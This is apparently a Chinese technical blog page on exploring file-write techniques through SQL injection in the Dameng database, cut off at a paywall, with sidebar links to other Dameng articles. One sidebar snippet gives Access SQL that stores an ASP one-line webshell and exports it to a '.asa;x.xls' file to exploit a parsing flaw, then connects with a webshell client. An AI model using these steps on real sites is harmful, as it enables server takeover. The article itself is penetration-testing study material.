达梦数据库写文件的方式探索

最新推荐文章于 2025-03-25 23:20:45 发布
原创 最新推荐文章于 2025-03-25 23:20:45 发布 · 1.5k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #oracle

0x01 前沿

这篇文章整体算是《达梦数据库手工注入笔记》的续集,达梦作为国内优秀的信创数据库,在关基单位中拥有越来越大的用户使用量。

通过SQL注入来写文件一直以来都是SQL注入漏洞深入利用的一种方式,对于不同的数据库通常写文件的方式也是不一样的。通过笔者的探索发现,达梦数据库(以后简称DMSQL)写文件的方式也与其它数据库存在较大的差异。

DMSQL默认情况下是支持堆叠注入的(笔者试了官方给的java版本的SDK,其它版本未尝试),也就是说在注入的时候支持多语句,支持多语句为攻击者提供了对SQL注入漏洞进行深入利用的遐想,也使得本文利用DMSQL写文件的研究具有实际意义。

0x02 探索

熟悉渗透的小伙伴都会有一些通过SQL注入写文件的技巧,我们首先通过两种经典的写文件方式来探索达梦写文件的不同。

1) 通过into outfile方式写文件

在MySQL数据库中可以通过经典的into outfile来把查询结果保存在文件中,但是在DMSQL中并没有相应的语法,也没有into dumpfile的语法,如下图所示:

图片

2) 通过backup database方式写文件

在MSSQL数据库中可以通过备份的方式来写文件,而且在DMSQL中也存在相似的语法,如下图所示:

图片

本以为应该是以与MSSQL相似的手法就可以直接备份写文件,但在实际使用过程中发

最低0.47元/天 解锁文章
盛邦安全
关注
数据库命令执行Getshell
m0_53087192的博客
01-19 1071
Access导出 Access可导出xxx等文件需要配合解析漏洞 create table cmd (a varchar(50)); insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%> select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd drop table cmd 菜刀直连https://www.xxx.c
达梦数据库快速装载工具
2401_86400744的博客
09-24 1384
DIRECT数据装载方式,布尔值。导入文件/opt/data/test1.txt,STR X '0A'表示使用'\n'作为换行符,错误日志保存在/opt/data/test1.bad,数据导入到数据库中的test1表,使用'|'作为分隔符,之后非F1,F2,F3是对应的列名。本示例中,SKIP = 0表示初始忽略逻辑行数为0,ROWS = 50000表示每50000提交一次,DIRECT = FALSE表示不使用快速填充,INDEX_OPTION = 2表示不刷新二级索引,数据装载完成后重建所有二级索引。
达梦数据库移动数据文件
qq_36192280的博客
07-25 766
达梦数据库移动数据文件 一、达梦数据文件管理说明 DM 数据库数据库中的所有对象分配逻辑空间,并存放在数据文件中。在 DM 数据库内 部,所有的数据文件组合在一起被划分到一个或者多个表空间中,所有的数据库内部对象都 存放在这些表空间中。同时,表空间被进一步划分为段、簇和页(也称块)。通过这种细分, 可以使得 DM 数据库能够更加高效地控制磁盘空间的利用率 在 DM 数据库中,表空间由一个或者多个数据文件组成。DM 数据库中的所有对象在逻辑 上都存放在表空间中,而物理上都存储在所属表空间的数据文件中。 在
使用shell脚本执行达梦数据库sql脚本文件
qq_38428100的博客
01-11 1万+
使用shell脚本执行达梦数据库sql脚本文件 最近遇到一个问题,需要给现场实施人员准备数据库执行脚本,但需要进行隔离操作,避免现场人员误操作修改了sql,导致出现其他问题。达梦数据库在网上的资料真是少之又少,但是发现大多数达梦语法描述为同oracle,嗯??…… 方式一 当然是windows电脑安装达梦管理工具,直接把脚本贴进去执行,但避免不了出现误操作 方式二 使用shell脚本执行sql 1. 先找到达梦数据库安装位置吧 [root@localhost ~]# ss -nlp |grep 5236
达梦数据文件分析
cn_lyt的博客
01-22 1230
数据文件为用户数据实际存放的文件,后缀为.dbf。页大小为最小数据存储单元,最大为段。一个数据文件由若干段组成。数据文件的最小起始大小为4096*页大小。单个数据文件大小可在创建时进行限制,也可不限制但在操作系统文件系统层面受限制或者在磁盘空间剩余量限制,一般考虑创建多个数据文件不建议使用单个大文件。一个表空间最多256个数据文件。 如下图所示页大小为32K时,文件中数据分布则以32K为间隔。 数据页由页头控制信息、 数据区、空闲空间、行偏移数组组成。页头控制信息包含...
DM8达梦数据库文件管理
meminic的博客
10-18 769
DM8数据库中的文件主要有参数文件,控制文件,数据文件和日志文件。 由图可以看到参数文件是dm.ini文件,控制文件是dm.ctl文件,数据文件是以DBF结尾的文件,日志文件是以log结尾的文件。 目录 1.参数文件管理 2.控制文件管理 3.数据文件管理 3.1 创建数据文件 3.2 更改数据文件路径 3.3 误删数据文件恢复 4.日志文件管理 4.1 新增重做日志文件 4.2 更改重做日志文件大小 4.3 更改重做日志文件路径 1.参数文件管理 是DM数据库用来设置功能选
精选资源
达梦数据库Docker镜像
04-03
达梦数据库Docker镜像的推出,不仅为用户提供了又一种部署达梦数据库的高效方式,也是达梦公司积极探索新技术、勇于创新的有力证明。未来随着Docker技术的进一步普及和应用,达梦数据库Docker镜像将在数据库管理和...
Delphi 12.3控件之delphi连接达梦数据库odbc测试demo.zip
最新发布
07-17
本压缩包中的文件集合了Delphi 12.3环境下的一个项目,该项目主要功能是测试Delphi连接达梦数据库通过ODBC进行数据操作的过程。项目名称被命名为“Delphi连接达梦数据库odbc测试demo”。在该压缩包中,包含了Delphi...
达梦数据库最新全套学习文档.zip
07-17
达梦数据库是一款由中国达梦公司自主研发的高性能、高可靠性的关系型数据库管理系统,广泛应用于政府...在实际应用中,还需要结合实践不断探索和磨练,以提升对达梦数据库的掌握程度,实现更高效的数据管理和应用开发。
数据文件与日志文件介绍(DM8:达梦数据库
qq_37358909的博客
07-05 4872
数据库软件是一套数据管理系统的集合,数据最终会存储到操作系统的物理文件中,还有相关的日志文件;即用户通过创建表空间相关操作生成的表空间。点击跳转,查看配置步骤每个 RLOG_PKG 都有对应的序号属性,称之为包序号(PKG SEQNO),日志包生成时按照序号连续递增。包序号包括本地包序号(LSEQ)和全局包序号(GSEQ),本地包序号是节点内唯一、连续递增的值,用于校验联机日志连续性;全局包序号由数据守护集群的主备库共同维护,具有全局唯一、连续、递增的特性,用于校验归档日志的连续性。
达梦数据库配置文件参数说明
weixin_41899967的博客
07-28 2980
在此限制之外,会再多保留一个备份文件,在生成新的备份文件时,如果当前已存在的备份文件个数大于指定值,则自动删除创建时间最早的备份文件,小于或等于指定值的情况下,不会有删除操作,缺省值为 10。动态修改: 使用系统过程SP_SET_PARA_VALUE()、SP_SET_PARA_DOUBLE_VALUE()和 SP_SET_PARA_STRING_VALUE()。注:数据守护环境下建议配置为 0,实例处于主机或备机模式后,不允许用户直接通过 SQL 语句修改服务器的模式、状态和OGUID。
DM8达梦数据库表空间创建、数据文件、用户基础命令
wad150365的博客
03-25 2658
文件扩展大小表示当需要扩展文件时,文件一次增大的空间大小,取值范围是0—2048,单位是M。可以为普通表空间添加HUGE数据文件路径将其升级为混合表空间,也可以为混合表空间添加HUGE数据文件路径,一个混合表空间最多可以添加255个HUGE数据文件路径。回滚表空间的管理和用户表空间的管理基本是一样的,区别是回滚空间的空间名固定为ROLL,不可修改。创建表空间时可指定文件的扩展属性。系统一旦检测出某个表空间内的数据文件被删除,则与该表空间所有的操作都将会失败,并报错该表空间内有数据文件被删除。
达梦数据库操作
c_515691131的博客
11-03 1918
DM管理工具:用于连接DM数据库,类似PLSQL、SQLyog。
达梦数据库在备份完如何通过.bak文件恢复备份
qq_38196449的博客
12-12 3283
我们现在是2024-12-11的下午,由于误操作将某个表删了,或者把某条重要数据删了,我们想恢复,该如何操作?命令来关闭数据库,因为恢复备份需要关闭数据库。如果执行中没发现错误,则重启数据库服务即可。如果结果为Y,则代表已经开启。双击dmrman.exe打开。
达梦空间数据
话别深秋
03-23 3351
POINT(0 0) -- 点LINESTRING(0 0,1 1,1 2) -- 线POLYGON((0 0,4 0,4 4,0 4,0 0),(1 1, 2 1, 2 2, 1 2,1 1)) -- 面MULTIPOINT(0 0,1 2) -- 多点MULTILINESTRING((0 0,1 1,1 2),(2 3,3 2,5 4)) -- 多线。
达梦数据库——修改数据文件物理位置
weixin_46458436的博客
03-16 2075
达梦数据库数据文件移动的实操演示
达梦数据库使用教程,个人足够
热门推荐
m0_55906900的博客
02-20 2万+
达梦数据库使用手册,帮你快速入门达梦数据库
达梦数据库——目录文件及各配置文件、参数说明
weixin_46458436的博客
01-19 7933
达梦数据库安装目录下各个文件简介简介
【精细版】达梦数据库之日常操作篇
会飞的树懒的博客
05-23 1万+
达梦数据库的基本操作详解
探索达梦数据库8的Linux版本特性
资源摘要信息:"达梦数据库8,Linux版本" 达梦数据库是由中国本土公司研发的数据库管理系统,具有完全自主知识产权,是国产数据库的重要代表之一。达梦数据库8版本是在Linux操作系统上运行的最新版本,适合企业级...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值